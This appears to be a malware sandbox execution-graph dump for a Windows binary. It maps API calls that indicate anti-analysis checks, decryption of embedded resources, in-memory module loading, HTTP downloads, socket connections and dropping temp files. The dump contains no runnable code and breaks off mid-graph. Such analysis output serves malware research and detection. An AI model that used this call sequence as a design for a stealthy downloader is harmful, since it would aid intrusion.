                                                                                                                                                                                                                                                                          execution_graph 5539 4008e80 5540 4008e99 lstrcpyA 5539->5540 5541 4008f15 5539->5541 5546 4007b70 5540->5546 5544 4008f4c Sleep 5545 4008ed4 5544->5545 5545->5541 5545->5544 5547 4007b7b SetEvent 5546->5547 5547->5545 5548 4004880 5549 400488f 5548->5549 5550 4004a9f CryptReleaseContext 5549->5550 5552 40048be CryptCreateHash 5549->5552 5551 4004aab 5550->5551 5553 4004a90 5552->5553 5554 40048f9 CryptHashData 5552->5554 5553->5550 5555 4004a83 CryptDestroyHash 5554->5555 5556 4004919 CryptDeriveKey 5554->5556 5555->5553 5556->5555 5557 400494a CryptDecrypt CryptDestroyKey 5556->5557 5557->5555 5558 4004995 CryptCreateHash 5557->5558 5558->5555 5559 40049b7 CryptHashData 5558->5559 5560 4004a76 CryptDestroyHash 5559->5560 5561 40049da CryptGetHashParam 5559->5561 5560->5555 5561->5560 5562 4004a11 CryptGetHashParam 5561->5562 5562->5560 5563 4004a3e 5562->5563 5563->5560 5564 4002900 5565 4002ae5 5564->5565 5566 400291a 5564->5566 5566->5565 5567 400292e InternetOpenA 5566->5567 5567->5565 5568 400294f InternetConnectA 5567->5568 5569 4002adb InternetCloseHandle 5568->5569 5570 400297f HttpOpenRequestA 5568->5570 5569->5565 5571 40029b0 wsprintfA InternetQueryOptionA InternetSetOptionA lstrlenA HttpSendRequestA 5570->5571 5572 4002ad1 InternetCloseHandle 5570->5572 5573 4002a35 5571->5573 5574 4002aaf GetLastError 5571->5574 5572->5569 5576 4002a82 5573->5576 5577 4002a4a InternetReadFile 5573->5577 5575 4002ac7 InternetCloseHandle 5574->5575 5575->5572 5576->5575 5577->5573 5577->5576 4517 401284 __set_app_type 4520 401000 4517->4520 4521 401010 4520->4521 4522 40102c SetUnhandledExceptionFilter 4520->4522 4521->4522 4523 40103e 4522->4523 4524 401043 __getmainargs 4523->4524 4525 4010c8 _setmode _setmode _setmode 4524->4525 4526 40107e __p__fmode 4524->4526 4525->4526 4532 401f00 4526->4532 4528 401090 4529 401098 __p__environ 4528->4529 4548 40216c 4529->4548 4534 401f1c 4532->4534 4547 401f12 4532->4547 4533 401f53 4539 401f5c 4533->4539 4533->4547 4534->4533 4535 401fad 4534->4535 4534->4547 4536 4020bb 4535->4536 4542 401fb9 4535->4542 4538 401dd0 9 API calls 4536->4538 4540 4020cb 4538->4540 4541 401f87 4539->4541 4555 401e1c 4539->4555 4540->4528 4541->4528 4543 401ff0 4542->4543 4542->4547 4543->4542 4544 401e1c 9 API calls 4543->4544 4546 401e1c 9 API calls 4543->4546 4576 401dd0 fwrite vfprintf abort 4543->4576 4544->4542 4546->4543 4547->4528 4598 402148 4548->4598 4550 402184 GetCommandLineA GetStartupInfoA 4551 40219b GetModuleHandleA 4550->4551 4600 4015a6 6 API calls 4551->4600 4554 4010b9 _cexit ExitProcess 4556 401e38 VirtualQuery 4555->4556 4557 401e2d 4555->4557 4558 401e60 4556->4558 4559 401ee8 4556->4559 4557->4539 4561 401edc 4558->4561 4562 401e6d VirtualProtect 4558->4562 4560 401dd0 6 API calls 4559->4560 4565 401f00 4560->4565 4561->4539 4562->4557 4563 401ea9 4562->4563 4563->4557 4564 401eb2 VirtualProtect 4563->4564 4564->4539 4566 401f53 4565->4566 4567 401fad 4565->4567 4575 401f12 4565->4575 4569 401e1c 6 API calls 4566->4569 4566->4575 4568 4020bb 4567->4568 4572 401fb9 4567->4572 4570 401dd0 6 API calls 4568->4570 4569->4566 4571 4020cb 4570->4571 4571->4539 4573 401dd0 6 API calls 4572->4573 4574 401e1c 6 API calls 4572->4574 4572->4575 4573->4572 4574->4572 4575->4539 4577 401e1c 4576->4577 4578 401e38 VirtualQuery 4577->4578 4579 401e2d 4577->4579 4580 401e60 4578->4580 4581 401ee8 4578->4581 4579->4543 4583 401edc 4580->4583 4584 401e6d VirtualProtect 4580->4584 4582 401dd0 3 API calls 4581->4582 4587 401f00 4582->4587 4583->4543 4584->4579 4585 401ea9 4584->4585 4585->4579 4586 401eb2 VirtualProtect 4585->4586 4586->4543 4588 401fad 4587->4588 4592 401f53 4587->4592 4594 401f12 4587->4594 4589 4020bb 4588->4589 4595 401fb9 4588->4595 4591 401dd0 3 API calls 4589->4591 4590 401e1c 3 API calls 4590->4592 4593 4020cb 4591->4593 4592->4590 4592->4594 4593->4543 4594->4543 4595->4594 4596 401dd0 3 API calls 4595->4596 4597 401e1c VirtualQuery VirtualProtect VirtualProtect 4595->4597 4596->4595 4597->4595 4599 4020fc 4598->4599 4599->4550 4617 40140e ZwOpenSymbolicLinkObject 4600->4617 4603 4016f9 4620 401479 LdrFindResource_U LdrAccessResource NtAllocateVirtualMemory 4603->4620 4604 4016ed ExitProcess 4607 401479 3 API calls 4608 401763 4607->4608 4622 401a87 GetDC ChoosePixelFormat SetPixelFormat wglCreateContext wglMakeCurrent 4608->4622 4610 4017e8 PeekMessageA 4612 401854 15 API calls 4610->4612 4613 4017e3 4610->4613 4611 4019bc 4623 401b48 wglMakeCurrent wglDeleteContext ReleaseDC 4611->4623 4612->4613 4613->4610 4613->4611 4615 401833 TranslateMessage DispatchMessageA 4613->4615 4615->4613 4616 4019d5 DestroyWindow 4616->4554 4618 401443 ZwOpenSymbolicLinkObject 4617->4618 4619 40143c 4617->4619 4618->4619 4619->4603 4619->4604 4621 40155c 4620->4621 4621->4607 4622->4613 4623->4616 5904 4006444 5905 400644d 5904->5905 5906 400647b 5905->5906 5907 40064ba GetEnvironmentVariableA 5905->5907 5909 40065f3 5905->5909 5908 40064e1 5907->5908 5910 4009730 QueryPerformanceCounter 5908->5910 5911 4007250 7 API calls 5909->5911 5971 4006bbd 5909->5971 5914 40064f2 GetTickCount GetTempFileNameA CreateFileA 5910->5914 5912 4006638 5911->5912 5916 4006752 5912->5916 5917 4006654 VirtualAlloc 5912->5917 5913 400a360 3 API calls 5913->5906 5914->5909 5915 4006552 WriteFile 5914->5915 5918 4006588 5915->5918 5919 40065dd 5915->5919 5922 40069ba GetEnvironmentVariableA 5916->5922 5925 4006858 5916->5925 5926 400678e VirtualAlloc 5916->5926 5917->5916 5920 400667a 5917->5920 5918->5919 5923 4006593 CloseHandle 5918->5923 5919->5909 5921 40065e6 CloseHandle 5919->5921 5973 40097a0 GetProcessHeap RtlAllocateHeap 5920->5973 5921->5909 5924 40069e1 5922->5924 5927 4006c60 4 API calls 5923->5927 5931 4009730 QueryPerformanceCounter 5924->5931 5928 4002070 32 API calls 5925->5928 5938 40067c6 5926->5938 5942 4006856 5926->5942 5929 40065ab 5927->5929 5928->5942 5930 4001e60 2 API calls 5929->5930 5933 40065b7 5930->5933 5934 40069f2 GetTickCount GetTempFileNameA CreateFileA 5931->5934 5939 40065d8 5933->5939 5940 40065c9 5933->5940 5941 4006a4f 5934->5941 5934->5971 5935 4006698 CreateThread CloseHandle 5935->5916 5936 40069a6 5936->5922 5937 4006842 VirtualFree 5937->5942 5938->5937 5944 4002070 32 API calls 5938->5944 5947 4006cf0 4 API calls 5939->5947 5946 40074a0 30 API calls 5940->5946 5948 4006a7b VirtualAlloc 5941->5948 5949 4006b1e WriteFile 5941->5949 5942->5936 5943 4006891 5942->5943 5950 40073c0 5 API calls 5942->5950 5945 400698a 5943->5945 5974 40097a0 GetProcessHeap RtlAllocateHeap 5943->5974 5952 40067f5 5944->5952 5945->5936 5959 4002510 8 API calls 5945->5959 5954 40065ce ExitProcess 5946->5954 5947->5919 5951 4006b1c 5948->5951 5955 4006aaf 5948->5955 5949->5951 5950->5943 5956 4006bc9 CloseHandle 5951->5956 5960 4006b59 CloseHandle 5951->5960 5952->5937 5957 4006809 VirtualAlloc 5952->5957 5965 4006ad2 WriteFile 5955->5965 5966 4006b08 VirtualFree 5955->5966 5956->5971 5961 400683f 5957->5961 5958 40068aa 5962 40068e9 VirtualAlloc 5958->5962 5964 40068ca 5958->5964 5959->5936 5963 4001e60 2 API calls 5960->5963 5961->5937 5962->5964 5967 4006b72 5963->5967 5964->5945 5968 400693f CreateThread CloseHandle 5964->5968 5965->5966 5966->5951 5969 4006b9e 5967->5969 5970 40073c0 5 API calls 5967->5970 5967->5971 5968->5945 5975 40077b0 49 API calls 5968->5975 5969->5971 5972 4002510 8 API calls 5969->5972 5970->5969 5971->5906 5971->5913 5972->5971 5973->5935 5974->5958 5578 4006305 5582 400630e 5578->5582 5579 400633c 5580 400640e 5580->5579 5581 40064ba GetEnvironmentVariableA 5580->5581 5587 40065f3 5580->5587 5585 40064e1 5581->5585 5582->5579 5582->5580 5583 4006410 5582->5583 5584 40063a4 VirtualAlloc 5582->5584 5586 4001ee0 2 API calls 5583->5586 5584->5580 5593 40063cc 5584->5593 5588 4009730 QueryPerformanceCounter 5585->5588 5586->5580 5589 4007250 7 API calls 5587->5589 5653 4006bbd 5587->5653 5592 40064f2 GetTickCount GetTempFileNameA CreateFileA 5588->5592 5590 4006638 5589->5590 5596 4006752 5590->5596 5597 4006654 VirtualAlloc 5590->5597 5591 400a360 3 API calls 5591->5579 5592->5587 5595 4006552 WriteFile 5592->5595 5594 40063fd VirtualFree 5593->5594 5598 4001ee0 2 API calls 5593->5598 5594->5580 5599 4006588 5595->5599 5600 40065dd 5595->5600 5604 40069ba GetEnvironmentVariableA 5596->5604 5607 4006858 5596->5607 5608 400678e VirtualAlloc 5596->5608 5597->5596 5601 400667a 5597->5601 5602 40063f4 5598->5602 5599->5600 5605 4006593 CloseHandle 5599->5605 5600->5587 5603 40065e6 CloseHandle 5600->5603 5655 40097a0 GetProcessHeap RtlAllocateHeap 5601->5655 5602->5594 5603->5587 5606 40069e1 5604->5606 5609 4006c60 4 API calls 5605->5609 5613 4009730 QueryPerformanceCounter 5606->5613 5610 4002070 32 API calls 5607->5610 5620 40067c6 5608->5620 5624 4006856 5608->5624 5611 40065ab 5609->5611 5610->5624 5612 4001e60 2 API calls 5611->5612 5615 40065b7 5612->5615 5616 40069f2 GetTickCount GetTempFileNameA CreateFileA 5613->5616 5621 40065d8 5615->5621 5622 40065c9 5615->5622 5623 4006a4f 5616->5623 5616->5653 5617 4006698 CreateThread CloseHandle 5617->5596 5618 40069a6 5618->5604 5619 4006842 VirtualFree 5619->5624 5620->5619 5626 4002070 32 API calls 5620->5626 5629 4006cf0 4 API calls 5621->5629 5628 40074a0 30 API calls 5622->5628 5630 4006a7b VirtualAlloc 5623->5630 5631 4006b1e WriteFile 5623->5631 5624->5618 5625 4006891 5624->5625 5632 40073c0 5 API calls 5624->5632 5627 400698a 5625->5627 5656 40097a0 GetProcessHeap RtlAllocateHeap 5625->5656 5634 40067f5 5626->5634 5627->5618 5641 4002510 8 API calls 5627->5641 5636 40065ce ExitProcess 5628->5636 5629->5600 5633 4006b1c 5630->5633 5637 4006aaf 5630->5637 5631->5633 5632->5625 5638 4006bc9 CloseHandle 5633->5638 5642 4006b59 CloseHandle 5633->5642 5634->5619 5639 4006809 VirtualAlloc 5634->5639 5647 4006ad2 WriteFile 5637->5647 5648 4006b08 VirtualFree 5637->5648 5638->5653 5643 400683f 5639->5643 5640 40068aa 5644 40068e9 VirtualAlloc 5640->5644 5646 40068ca 5640->5646 5641->5618 5645 4001e60 2 API calls 5642->5645 5643->5619 5644->5646 5649 4006b72 5645->5649 5646->5627 5650 400693f CreateThread CloseHandle 5646->5650 5647->5648 5648->5633 5651 4006b9e 5649->5651 5652 40073c0 5 API calls 5649->5652 5649->5653 5650->5627 5657 40077b0 49 API calls 5650->5657 5651->5653 5654 4002510 8 API calls 5651->5654 5652->5651 5653->5579 5653->5591 5654->5653 5655->5617 5656->5640 5658 402548 5661 4012bc 5658->5661 5660 402553 5662 4012cc GetModuleHandleA 5661->5662 5663 4012f0 5661->5663 5662->5663 5664 4012dd GetProcAddress 5662->5664 5663->5660 5664->5663 5976 40230c 5977 402328 EnterCriticalSection 5976->5977 5978 40231f 5976->5978 5979 402357 LeaveCriticalSection 5977->5979 5981 40233f 5977->5981 5980 402364 5979->5980 5981->5979 5982 402345 free LeaveCriticalSection 5981->5982 5982->5980 5665 10001890 FreeLibrary 5666 400a090 socket 5667 400a0b2 htons gethostbyname 5666->5667 5668 400a0aa 5666->5668 5667->5668 5673 400a0db 5667->5673 5669 400a12a 5671 400a148 5669->5671 5672 400a13a closesocket 5669->5672 5670 400a117 connect 5670->5669 5670->5673 5671->5668 5674 400a14e setsockopt setsockopt 5671->5674 5672->5668 5673->5669 5673->5670 5674->5668 5675 4002890 5676 40028a0 InternetOpenA 5675->5676 5677 4002899 5675->5677 5677->5676 5678 4002090 5679 40020b0 32 API calls 5678->5679 5680 40020a2 5679->5680 5984 4003450 5985 4003494 VirtualFree 5984->5985 5986 40034a7 5985->5986 5987 40028d0 5988 40028e1 InternetCloseHandle 5987->5988 5989 40028f1 5987->5989 5988->5989 5990 401110 5991 401125 5990->5991 5992 401160 5990->5992 5993 401178 5991->5993 5995 40112c 5991->5995 5994 401186 signal 5992->5994 5992->5995 5996 4011bc signal 5993->5996 5997 40117f 5993->5997 5999 401203 signal 5994->5999 6002 40114e 5994->6002 5998 401131 signal 5995->5998 5995->6002 6000 40121f signal 5996->6000 5996->6002 5997->5994 5997->6002 6001 40123b signal 5998->6001 5998->6002 5999->6002 6000->6002 6001->6002 5681 4004096 5682 400409f 5681->5682 5683 40040ab EnterCriticalSection 5682->5683 5684 40042cd DeleteCriticalSection 5682->5684 5686 40040da 5683->5686 5687 40040bb VirtualFree 5683->5687 5685 40042d7 5684->5685 5688 40040e0 TerminateThread 5686->5688 5689 40040f3 ResetEvent LeaveCriticalSection CreateThread 5686->5689 5687->5686 5688->5689 5702 40097a0 GetProcessHeap RtlAllocateHeap 5689->5702 5704 4004ac0 164 API calls 5689->5704 5691 4004221 WaitForMultipleObjects WaitForSingleObject 5692 400424b 5691->5692 5693 400424f WaitForSingleObject 5691->5693 5692->5693 5695 4004273 EnterCriticalSection 5693->5695 5696 4004267 TerminateThread 5693->5696 5694 400413a 5694->5691 5699 40041d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 5694->5699 5697 40042a2 LeaveCriticalSection 5695->5697 5698 4004283 VirtualFree 5695->5698 5696->5695 5700 40097c0 2 API calls 5697->5700 5698->5697 5699->5694 5703 4004ba0 74 API calls 5699->5703 5701 40042bb 5700->5701 5701->5684 5702->5694 6003 40065d6 6004 40065dd 6003->6004 6005 40065e6 CloseHandle 6004->6005 6007 40065f3 6004->6007 6005->6007 6006 4006bbd 6010 400a360 3 API calls 6006->6010 6013 4006c13 6006->6013 6007->6006 6008 4007250 7 API calls 6007->6008 6009 4006638 6008->6009 6011 4006752 6009->6011 6012 4006654 VirtualAlloc 6009->6012 6010->6013 6015 40069ba GetEnvironmentVariableA 6011->6015 6017 4006858 6011->6017 6018 400678e VirtualAlloc 6011->6018 6012->6011 6014 400667a 6012->6014 6055 40097a0 GetProcessHeap RtlAllocateHeap 6014->6055 6016 40069e1 6015->6016 6020 4009730 QueryPerformanceCounter 6016->6020 6019 4002070 32 API calls 6017->6019 6025 40067c6 6018->6025 6027 4006856 6018->6027 6019->6027 6022 40069f2 GetTickCount GetTempFileNameA CreateFileA 6020->6022 6022->6006 6026 4006a4f 6022->6026 6023 4006698 CreateThread CloseHandle 6023->6011 6024 4006842 VirtualFree 6024->6027 6025->6024 6028 4002070 32 API calls 6025->6028 6029 4006a7b VirtualAlloc 6026->6029 6030 4006b1e WriteFile 6026->6030 6031 40073c0 5 API calls 6027->6031 6032 4006891 6027->6032 6038 40069a6 6027->6038 6034 40067f5 6028->6034 6033 4006b1c 6029->6033 6036 4006aaf 6029->6036 6030->6033 6031->6032 6037 400698a 6032->6037 6056 40097a0 GetProcessHeap RtlAllocateHeap 6032->6056 6039 4006bc9 CloseHandle 6033->6039 6043 4006b59 CloseHandle 6033->6043 6034->6024 6040 4006809 VirtualAlloc 6034->6040 6048 4006ad2 WriteFile 6036->6048 6049 4006b08 VirtualFree 6036->6049 6037->6038 6042 4002510 8 API calls 6037->6042 6038->6015 6039->6006 6044 400683f 6040->6044 6041 40068aa 6045 40068e9 VirtualAlloc 6041->6045 6047 40068ca 6041->6047 6042->6038 6046 4001e60 2 API calls 6043->6046 6044->6024 6045->6047 6050 4006b72 6046->6050 6047->6037 6051 400693f CreateThread CloseHandle 6047->6051 6048->6049 6049->6033 6050->6006 6052 4006b9e 6050->6052 6053 40073c0 5 API calls 6050->6053 6051->6037 6057 40077b0 49 API calls 6051->6057 6052->6006 6054 4002510 8 API calls 6052->6054 6053->6052 6054->6006 6055->6023 6056->6041 6058 40229c 6059 4022b4 calloc 6058->6059 6060 4022ac 6058->6060 6059->6060 6061 4022ce EnterCriticalSection LeaveCriticalSection 6059->6061 6061->6060 5705 4008f1e 5706 4008f4c Sleep 5705->5706 5707 4008ed4 5706->5707 5707->5706 5708 4008f15 5707->5708 5709 401c60 5710 401c73 5709->5710 5712 401c85 5710->5712 5713 402398 5710->5713 5714 4023e4 5713->5714 5715 4023a6 5713->5715 5716 402400 InitializeCriticalSection 5714->5716 5717 4023ed 5714->5717 5718 4023bc 5715->5718 5721 4023a8 5715->5721 5716->5717 5717->5712 5719 40222c 4 API calls 5718->5719 5722 4023c1 5719->5722 5720 4023b2 5720->5712 5721->5720 5725 40222c 5721->5725 5722->5720 5724 4023c9 DeleteCriticalSection 5722->5724 5724->5720 5726 402244 EnterCriticalSection 5725->5726 5727 40223d 5725->5727 5728 402285 LeaveCriticalSection 5726->5728 5730 40225b 5726->5730 5727->5720 5728->5720 5729 40225c TlsGetValue GetLastError 5729->5730 5730->5728 5730->5729 5731 100014a0 5732 100014e8 5731->5732 5733 100014d9 SetLastError 5731->5733 5735 10001505 SetLastError 5732->5735 5736 10001514 5732->5736 5734 1000169f 5733->5734 5735->5734 5737 10001562 5736->5737 5738 10001527 5736->5738 5741 1000156b SetLastError 5737->5741 5742 1000157f 5737->5742 5739 10001549 5738->5739 5740 1000153a SetLastError 5738->5740 5739->5734 5745 10001693 SetLastError 5739->5745 5740->5734 5741->5734 5743 10001648 bsearch 5742->5743 5750 100019f0 VirtualAlloc 5742->5750 5743->5739 5744 10001672 SetLastError 5743->5744 5744->5734 5745->5734 5747 100015b3 5748 100015c8 SetLastError 5747->5748 5749 100015d7 5747->5749 5748->5734 5749->5743 5750->5747 5751 4006da0 5752 4006db9 Sleep CoInitialize 5751->5752 5753 400723f 5751->5753 5754 4007017 GetEnvironmentVariableA 5752->5754 5755 4006e1b 5752->5755 5758 400703e 5754->5758 5756 4006ee5 5755->5756 5757 4006e3f VirtualAlloc 5755->5757 5759 4002070 32 API calls 5756->5759 5760 4006ee3 5757->5760 5761 4006e6e 5757->5761 5762 4009730 QueryPerformanceCounter 5758->5762 5759->5760 5763 400700f 5760->5763 5765 4006f21 5760->5765 5771 40073c0 5 API calls 5760->5771 5767 4006ed2 VirtualFree 5761->5767 5773 4002070 32 API calls 5761->5773 5764 400704f GetTickCount GetTempFileNameA CreateFileA 5762->5764 5766 4007239 CoUninitialize 5763->5766 5764->5766 5768 40070ac 5764->5768 5772 4006ff6 5765->5772 5794 40097a0 GetProcessHeap RtlAllocateHeap 5765->5794 5766->5753 5767->5760 5769 400718b WriteFile 5768->5769 5770 40070db VirtualAlloc 5768->5770 5776 40071b5 CloseHandle 5769->5776 5774 4007116 5770->5774 5775 4007189 5770->5775 5771->5765 5772->5763 5779 4002510 8 API calls 5772->5779 5778 4006e97 5773->5778 5786 4007175 VirtualFree 5774->5786 5787 400713f WriteFile 5774->5787 5775->5776 5776->5766 5780 40071cb 5776->5780 5778->5767 5782 4006ea8 VirtualAlloc 5778->5782 5779->5763 5780->5766 5788 4001e60 2 API calls 5780->5788 5781 4006f3a 5783 4006f6a VirtualAlloc 5781->5783 5785 4006f57 5781->5785 5784 4006ecf 5782->5784 5783->5785 5784->5767 5785->5772 5789 4006fbd CreateThread CloseHandle 5785->5789 5786->5775 5787->5786 5790 40071e5 5788->5790 5789->5772 5790->5766 5791 4007217 5790->5791 5792 40073c0 5 API calls 5790->5792 5791->5766 5793 4002510 8 API calls 5791->5793 5792->5791 5793->5763 5794->5781 6062 4002f60 6065 4003090 GetPEB 6062->6065 6064 4002f72 6065->6064 6066 4007865 6067 400788f VirtualFree 6066->6067 6069 40097c0 2 API calls 6067->6069 6070 40078ba CoUninitialize 6069->6070 6072 40078c3 6070->6072 6073 100021ea 6074 100021f3 IsBadHugeReadPtr 6073->6074 6075 100023bb 6074->6075 6076 10002207 6074->6076 6076->6075 6086 10001840 LoadLibraryA 6076->6086 6077 1000222d 6078 10002239 SetLastError 6077->6078 6079 1000224d 6077->6079 6078->6075 6080 10001a20 3 API calls 6079->6080 6081 10002267 6080->6081 6082 10002273 SetLastError 6081->6082 6084 1000229d 6081->6084 6082->6075 6084->6075 6085 100023ae SetLastError 6084->6085 6085->6075 6086->6077 5795 40126c __set_app_type 5796 401000 60 API calls 5795->5796 5797 401284 __set_app_type 5796->5797 5798 401000 60 API calls 5797->5798 5799 40129c 5798->5799 6087 401c2c 6088 401c3a 6087->6088 6089 401c54 6088->6089 6090 402398 6 API calls 6088->6090 6090->6089 5800 4004cad 5801 4004cb6 5800->5801 5804 4004cc3 5801->5804 5805 40052a2 5801->5805 5802 4008370 24 API calls 5803 4005344 5802->5803 5806 4005354 lstrlenA lstrlenA 5803->5806 5807 40056b8 VirtualFree VirtualFree VirtualFree 5803->5807 5810 4004db7 GetCurrentThreadId 5804->5810 5811 4004e2c 5804->5811 5821 4004ce5 5804->5821 5805->5802 5806->5807 5809 4005385 wsprintfA CryptBinaryToStringA 5806->5809 5808 40056eb CoUninitialize 5807->5808 5809->5807 5812 40053d0 MultiByteToWideChar 5809->5812 5810->5821 5814 4004ee1 5811->5814 5815 4004e81 GetSystemMetrics GetSystemMetrics 5811->5815 5811->5821 5816 40017d0 16 API calls 5812->5816 5818 4004f40 5814->5818 5819 4004ef0 GlobalMemoryStatus 5814->5819 5815->5821 5817 400543e 5816->5817 5820 400569b 5817->5820 5823 400551b 5817->5823 5824 400547d VirtualFree 5817->5824 5818->5821 5825 4005032 5818->5825 5826 4004fdf lstrlenA 5818->5826 5819->5821 5820->5807 5822 40056a4 VirtualFree 5820->5822 5822->5807 5823->5820 5828 400552c EnterCriticalSection 5823->5828 5827 40054b1 5824->5827 5829 4005041 lstrlenA 5825->5829 5830 4005096 5825->5830 5826->5821 5827->5823 5837 40017d0 16 API calls 5827->5837 5833 4005542 VirtualAlloc 5828->5833 5834 400558c VirtualAlloc 5828->5834 5829->5821 5831 4005104 5830->5831 5832 40050a5 lstrlenA 5830->5832 5839 4005172 5831->5839 5840 4005113 lstrlenA 5831->5840 5832->5821 5838 4005578 5833->5838 5835 40055c7 GetTickCount 5834->5835 5836 400568e LeaveCriticalSection 5834->5836 5846 40055da 5835->5846 5836->5820 5837->5827 5838->5836 5841 40051e0 5839->5841 5842 4005181 lstrlenA 5839->5842 5840->5821 5843 400523f 5841->5843 5844 40051ef lstrlenA 5841->5844 5842->5821 5843->5821 5845 4009b90 QueryPerformanceCounter 5843->5845 5844->5821 5845->5821 5847 400565c VirtualFree 5846->5847 5847->5836 5530 4019ef 5531 4019fd 5530->5531 5532 401a17 5530->5532 5533 401a02 5531->5533 5534 401a1e PostQuitMessage 5531->5534 5535 401a0e 5531->5535 5533->5532 5536 401a60 DefWindowProcA 5533->5536 5534->5532 5535->5533 5537 401a3b 5535->5537 5536->5532 5537->5532 5538 401a43 PostQuitMessage 5537->5538 5538->5532 5860 4005db0 5861 4007d20 5860->5861 5862 4005dcc lstrcpyA 5861->5862 5863 4001e60 2 API calls 5862->5863 5864 4005ded 5863->5864 5848 4008e30 CreateEventA CreateThread WaitForSingleObject 5849 10002430 5850 10002441 VirtualProtect 5849->5850 5851 1000243c 5849->5851 5853 10002472 5850->5853 5852 100024a4 VirtualProtect 5852->5851 5853->5851 5853->5852 5854 4001f30 5855 4001f50 VirtualAlloc 5854->5855 5859 400203f 5854->5859 5856 4001f97 VirtualAlloc 5855->5856 5857 4001fad 5855->5857 5856->5857 5858 4002ed0 GetPEB 5857->5858 5857->5859 5858->5859 6091 10001870 GetProcAddress 6092 4002af0 6093 4002df2 6092->6093 6094 4002b0f 6092->6094 6094->6093 6095 4002b99 InternetOpenUrlA 6094->6095 6096 4002b4e InternetQueryOptionA InternetSetOptionA 6094->6096 6097 4002bc3 6095->6097 6098 4002dda GetLastError 6095->6098 6096->6095 6099 4002be0 HttpQueryInfoA 6097->6099 6098->6093 6100 4002c16 6099->6100 6101 4002dce InternetCloseHandle 6099->6101 6100->6101 6102 4002c3b VirtualAlloc 6100->6102 6101->6093 6102->6101 6103 4002c61 6102->6103 6104 4002c81 InternetReadFile 6103->6104 6105 4002ca6 6103->6105 6104->6103 6104->6105 6106 4002d10 HttpQueryInfoA 6105->6106 6107 4002d55 6106->6107 6108 4002d3f lstrcmpiA 6106->6108 6109 4002dba VirtualFree 6107->6109 6108->6107 6109->6101 6110 40038f0 6112 4003909 6110->6112 6111 4003a50 6112->6111 6113 40035e0 16 API calls 6112->6113 6114 40039fa VirtualQuery 6112->6114 6115 4003a1d VirtualProtect 6112->6115 6113->6112 6114->6112 6115->6112 6135 4004bf0 6136 4004bf9 6135->6136 6137 40056f0 CoUninitialize 6136->6137 6138 4004c10 WaitForSingleObject 6136->6138 6139 4004c28 VirtualAlloc VirtualAlloc VirtualAlloc 6136->6139 6138->6139 6140 4004c23 6138->6140 6139->6140 6141 4004c8a 6139->6141 6140->6137 6141->6140 6144 4004cc3 6141->6144 6150 40052a2 6141->6150 6142 4008370 24 API calls 6143 4005344 6142->6143 6145 4005354 lstrlenA lstrlenA 6143->6145 6146 40056b8 VirtualFree VirtualFree VirtualFree 6143->6146 6148 4004db7 GetCurrentThreadId 6144->6148 6149 4004e2c 6144->6149 6185 4004ce5 6144->6185 6145->6146 6147 4005385 wsprintfA CryptBinaryToStringA 6145->6147 6146->6140 6147->6146 6151 40053d0 MultiByteToWideChar 6147->6151 6148->6185 6152 4004ee1 6149->6152 6153 4004e81 GetSystemMetrics GetSystemMetrics 6149->6153 6149->6185 6150->6142 6154 40017d0 16 API calls 6151->6154 6156 4004f40 6152->6156 6157 4004ef0 GlobalMemoryStatus 6152->6157 6153->6185 6155 400543e 6154->6155 6158 400569b 6155->6158 6160 400551b 6155->6160 6161 400547d VirtualFree 6155->6161 6162 4005032 6156->6162 6163 4004fdf lstrlenA 6156->6163 6156->6185 6157->6185 6158->6146 6159 40056a4 VirtualFree 6158->6159 6159->6146 6160->6158 6165 400552c EnterCriticalSection 6160->6165 6164 40054b1 6161->6164 6166 4005041 lstrlenA 6162->6166 6167 4005096 6162->6167 6163->6185 6164->6160 6174 40017d0 16 API calls 6164->6174 6170 4005542 VirtualAlloc 6165->6170 6171 400558c VirtualAlloc 6165->6171 6166->6185 6168 4005104 6167->6168 6169 40050a5 lstrlenA 6167->6169 6176 4005172 6168->6176 6177 4005113 lstrlenA 6168->6177 6169->6185 6175 4005578 6170->6175 6172 40055c7 GetTickCount 6171->6172 6173 400568e LeaveCriticalSection 6171->6173 6183 40055da 6172->6183 6173->6158 6174->6164 6175->6173 6178 40051e0 6176->6178 6179 4005181 lstrlenA 6176->6179 6177->6185 6180 400523f 6178->6180 6181 40051ef lstrlenA 6178->6181 6179->6185 6182 4009b90 QueryPerformanceCounter 6180->6182 6180->6185 6181->6185 6182->6185 6184 400565c VirtualFree 6183->6184 6184->6173 6116 4008cf0 6117 4008d07 6116->6117 6118 4008e1a 6116->6118 6117->6118 6119 4008d25 CryptAcquireContextA 6117->6119 6120 4008d49 GetLastError 6119->6120 6121 4008d7e 6119->6121 6122 4008d64 CryptAcquireContextA 6120->6122 6123 4008d5b 6120->6123 6121->6118 6124 4008d88 CryptCreateHash 6121->6124 6122->6121 6123->6121 6123->6122 6125 4008da3 CryptHashData 6124->6125 6126 4008e0e CryptReleaseContext 6124->6126 6127 4008e04 CryptDestroyHash 6125->6127 6128 4008dbb CryptDeriveKey 6125->6128 6126->6118 6127->6126 6128->6127 6129 4008ddf CryptDecrypt CryptDestroyKey 6128->6129 6129->6127 6130 100024f0 LoadLibraryExA 6131 1000251c GetProcAddress 6130->6131 6133 10002518 6130->6133 6134 10002537 VirtualProtect VirtualProtect 6131->6134 6134->6133 5865 4003936 5866 400393f 5865->5866 5867 4003a50 5866->5867 5869 40039fa VirtualQuery 5866->5869 5870 4003a1d VirtualProtect 5866->5870 5871 40035e0 GetModuleHandleA 5866->5871 5869->5866 5870->5866 5872 4003607 5871->5872 5873 40038da 5871->5873 5874 400361a GetModuleFileNameA 5872->5874 5873->5866 5874->5873 5875 400363b CreateFileA 5874->5875 5875->5873 5876 400366a GetFileSize 5875->5876 5877 400368c VirtualAlloc 5876->5877 5878 40038cd CloseHandle 5876->5878 5877->5878 5879 40036b5 ReadFile 5877->5879 5878->5873 5890 4003370 5879->5890 5885 4003872 VirtualFree VirtualFree 5885->5878 5886 4003738 5886->5885 5887 400384d 5886->5887 5889 40037f4 lstrcpynA lstrcatA lstrcpyA 5886->5889 5887->5885 5888 40035e0 3 API calls 5887->5888 5888->5885 5889->5887 5891 400337f 5890->5891 5892 4003397 5891->5892 5893 400339e VirtualAlloc 5891->5893 5896 4003580 5892->5896 5893->5892 5895 40033ca 5893->5895 5894 4003494 VirtualFree 5894->5892 5895->5892 5895->5894 5897 4003592 lstrlenA 5896->5897 5898 4003596 5896->5898 5897->5885 5897->5886 5898->5897 5900 40034b0 5898->5900 5902 40034bc 5900->5902 5903 40034c3 5900->5903 5901 4003518 lstrcmpA 5901->5902 5901->5903 5902->5897 5903->5901 5903->5902 4624 2370000 4634 23709fc GetPEB 4624->4634 4627 23709fc GetPEB 4631 2370281 4627->4631 4628 